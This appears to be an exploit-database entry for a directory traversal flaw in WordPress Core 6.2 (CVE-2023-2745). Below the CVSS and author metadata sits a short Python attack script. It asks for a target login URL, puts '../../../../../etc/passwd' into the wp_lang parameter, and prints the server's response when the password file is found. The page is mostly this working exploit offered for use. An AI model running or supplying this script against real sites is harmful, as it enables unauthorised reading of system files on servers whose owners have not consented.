WordPress Core 6.2 – Directory Traversal

Exploit Details

Basic Information

Exploit Title	WordPress Core 6.2 – Directory Traversal
Exploit ID	EDB-ID:52274
Type	exploitdb
Published	2025-04-22T00:00:00
Modified	2025-04-22T00:00:00

CVSS Information

CVSS Score	5.4
Severity	MEDIUM
Vector	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

CVE Information

CVE-2023-2745

Exploit Description

Exploit Title: WordPress Core 6.2 – Directory Traversal Date: 2025-04-16 Exploit Author: Milad Karimi (Ex3ptionaL) Contact: [email protected] Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL Version: =…

Exploit Code

# Exploit Title: WordPress Core 6.2 – Directory Traversal

# Date: 2025-04-16

# Exploit Author: Milad Karimi (Ex3ptionaL)

# Contact: [email protected]

# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL

# Version: = 6.2

# Tested on: Win, Ubuntu

# CVE : CVE-2023-2745
import requests

from colorama import init, Fore, Style

init(autoreset=True)

url = input(“E.G https://example.com/wp-login.php : “)

payload = ‘../../../../../etc/passwd’

response = requests.get(url, params={‘wp_lang’: payload})

if response.status_code == 200:

    if “root:x:0:0:root” in response.text:

        print(Fore.GREEN + ‘Exploit successful, accessed content:’)

        print(Fore.GREEN + response.text)

    else:

        print(Fore.YELLOW + ‘Accessed content, but the expected file was

not found:’)

        print(Fore.YELLOW + response.text)

elif response.status_code in {400, 401, 403, 404}:

    print(Fore.RED + f’Client error, status code: {response.status_code}’)

elif response.status_code // 100 == 5:

    print(Fore.RED + f’Server error, status code: {response.status_code}’)

elif response.status_code // 100 == 3:

    print(Fore.YELLOW + f’Redirection, status code:

{response.status_code}’)

else:

    print(f’Status code: {response.status_code}’)

View Full Exploit Details